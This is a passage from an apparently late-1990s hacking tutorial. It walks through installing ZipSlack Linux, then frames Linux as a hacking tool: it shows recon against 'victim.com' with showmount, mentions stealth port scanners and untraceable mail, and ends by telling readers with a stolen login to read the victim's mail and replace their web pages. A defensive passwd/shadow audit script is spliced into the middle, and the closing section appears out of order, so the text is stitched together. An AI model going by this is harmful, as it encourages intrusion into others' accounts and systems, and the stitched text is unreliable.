14/ Now you will have a black screen with a # looking at you. Dont let that worry you - its just like a MS-DOS screen. A few commands for now: 'ls' (like 'dir' in MS-DOS), 'cd' (change directory, like dos), 'pico' (an editor, use like 'pico text.txt'), and 'mc' (this is a nice menu program that comes with zipslack).
15/ Now, type 'setup'.
16/ Set up your mouse, network settings, screen stuff. Really easy. Just like - 'are you using a 2 button mouse or 3'? Easy.
17/ Now, if you want net access through this - type 'pppsetup'. This starts the ppp (point to point protocol) setup. You will need to know all your internet settings, like your Gateway, Nameserver numbers, etc. If you don't know these, go back to Windows and see what values you used from the Control Panel : Internet section.
18/ Okay. Reboot. Your mouse should be working, with some luck. Hopefully, your modem will be able to dial. Though, often not. If you have a standard external modem on Com 2, it is probably okay. Otherwise, it's sometimes a pain to configure your modem for Linux.
19/ If you are having modem troubles, type 'mc' to run the Midnight Commander. Open the 'etc' directory, then 'rc.d', then 'serials.rc'. Comment out the auto config section with '#' signs. And go to the manual config section. Uncomment /dev/cua0 (Com 1:) and /dev/cua1 (Com 2:) - or /dev/cua2 or cua3 (Com 3: or 4:) for internal modem users. Now, from Windows, go to Accessories:System Tools:System Information (Win 98) to get the IRQ and Port Settings for your modem. If you are in Win95, I think you have to run something called msd.com in the \windows directory. Put these settings in. Then, edit S.rc and at the bottom, uncomment the place where it says to call the serials.rc file.
20/ If you have a CD-Rom you can also edit S.rc so that it checks for a CD Rom during bootup.
21/ All things going well, you should now have a fully functional Unix type system on your computer. You can download all your latest little X-Crush programs (in .tgz format). To set up software - say a Linux stealth port scanner - save the .tgz file in a directory and run 'pkgtool'. Then go 'install file'. Real easy. If it is a C program, type 'gcc program.c' to compile it.
22/ Well, you are missing a Windows type interface. You don't need one, but if you want to surf using Linux, etc., it is better to have a graphical interface - although you can run a browser called 'lynx' just through the vanilla Linux interface.
23/ You can get some things, like X-Windows from ftp.cdrom.com/pub/linux/slackware/slakware/x1/
24/ Just get all the files that look vital (about 8 of them), and run pkgtool to install them all. You will probably find that setting up X-Win for the first time is a huge pain. It was for me at least - you need to know, for example, the horizontal and vertical refresh rates of your monitor. Then, get something like the Linux Netscape, or Arena as a browser. These run through X-Windows.
25/ You will have fun tweaking everything as you like it. There are dozens of windows interfaces to choose from. Some look almost identical to Win95.
26/ Where from here? You can now do practically anything - you basically have all the net power your ISP does, except for all the phone lines. You can let people use you as a dial up ISP, you can host web pages and set up FTP sites to run from your computer. You can set up email addresses, nameservers... anything.
27/ Because Linux is the same software as most ISPs run, a lot of hackers use Linux. You will be able to issue commands to other servers. You can ask other servers about themselves. For example, type 'showmount -e victim.com'. You can also run things like 'ping', and 'traceroute' directly from your command line. You can send mail from your own sendmail program so that it is untraceable.
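A defender's counterpart to step 13 and to the passwd-file discussion above. This is an added example, not code from the tutorial: it audits passwd and shadow entries for the weaknesses the text relies on: extra UID 0 (root-level) accounts, accounts with an empty password field, and password hashes sitting in the world-readable passwd file instead of shadow. The sample entries are constructed, not from any real system.

```python
# Added example (not from the tutorial). Sample entries are constructed.
PASSWD = """\
root:x:0:0:root:/root:/bin/sh
sync:*:5:0:sync:/sbin:/bin/sync
install:x:0:0:installer:/:/bin/sh
guest::500:100:guest:/home/guest:/bin/sh
demo:$1$ab$Xyz:501:100:demo:/home/demo:/bin/sh
"""
SHADOW = """\
root::10000:0:99999:7:::
install:$6$salt$hash:10000:0:99999:7:::
guest::10000:0:99999:7:::
demo:!:10000:0:99999:7:::
"""

def parse(text, min_fields):
    """Map account name -> remaining colon-separated fields."""
    entries = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < min_fields:
            continue  # malformed line: skip instead of crashing
        entries[parts[0]] = parts[1:]
    return entries

def audit(passwd_text, shadow_text):
    # Returns sorted (account, finding) pairs.
    findings = []
    users = parse(passwd_text, 7)
    shadow = parse(shadow_text, 2)
    for name, fields in users.items():
        pw, uid = fields[0], fields[1]
        if uid == "0" and name != "root":
            findings.append((name, "uid0"))  # extra root-level account
        if pw == "":
            findings.append((name, "empty-passwd-field"))  # login needs no password
        elif pw not in ("x", "*", "!"):
            findings.append((name, "hash-in-passwd"))  # crackable from a readable file
        if pw == "x":  # password lives in shadow; check it there
            spw = shadow.get(name, [None])[0]
            if spw is None:
                findings.append((name, "missing-shadow"))
            elif spw == "":
                findings.append((name, "empty-shadow-field"))
    return sorted(findings)

if __name__ == "__main__":
    print(audit(PASSWD, SHADOW))
```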
Some last incentives, if you were brought up in the Windows world and are afraid of command prompts, just type 'mc'. The zipslack distro comes with this 'Midnight Commander' - which I use a lot. And play a few games on the things. There are a few old favourites installed by default - like 'trek', and 'adventure', etc. If you were in computers 20 years ago, you will know what I mean. The games directory is in usr/games.
If you have got any more problems, there are a lot of people on the IRC #Linux channel on undernet who are very helpful. If your Linux is set up to the net, you can run the Linux Bitch-X IRC program to get there. Zipslack also has pine (for email), tin (for newsgroups), and lynx (for surfing).
Fact is, once you have had this all working for a few weeks (and are probably loving it), you will no doubt want to try some more advanced Linux distros. Although there are a lot of personal feelings about various distributions, I recommend RedHat 5.2 Linux. You will find it very easy to install.
If you are happy buying through Amazon.Com, here is
CURRENT LIMIT:
You have reached the current limit of the tutorials.... I will add further steps when I get the time and if people like these lessons. Also, if people want to write sections up for this, just mail the sections to me, to the e-mail address listed at Cyberarmy.Com.
Until this gets bigger, I can suggest a few books that teach hacking. I've found that a lot of books are rubbish and just teach how to change screen colours, but there are a few that every hacker should have in their library.
THE ESSENTIAL HACKER'S LIBRARY:
ESSENTIAL BOOKS:
1. MAXIMUM SECURITY
2. THE HAPPY HACKER
ESSENTIAL SOFTWARE:
1. LINUX
NOT ESSENTIAL, BUT RECOMMENDED BOOKS:
(These books are mainly just part of the Hacker Culture)
3. THE WATCHMAN
4. THE FUGITIVE GAME
5. TAKEDOWN
Okay, as for programming books - stuff it. You can download the things for free if you search for "perl + programming + tutorial" and things like that. Unless you like printed books, forget that. So, the only other thing is Linux. You will need to have Linux as a dual boot option on your PC if you want to do any serious hacking.
Some books that suck: these are some books going around that are a rip-off.
SECRETS OF A SUPER HACKER
So, keep going through this tutorial as it gets bigger, read anything you find on the web. Get some of the major books above, at least 1 and 2, and read them very carefully - four or five times. Join your local Linux users group, if you have one. And, later on, download a few guides on programming and read through them when you get some time. With some effort (it isn't easy), you can become a respected hacker and take control of the Net.
CONGRATULATIONS:
You have gained access.
If you now have the login code and password, you may use the user's mail account, FTP privileges (change their web pages by uploading new ones), and HTTP access.
(If you have only got access to a user level account, do not despair. If you have a user level account, it is easy to use that to later get a root level account. More on this when this study is made bigger).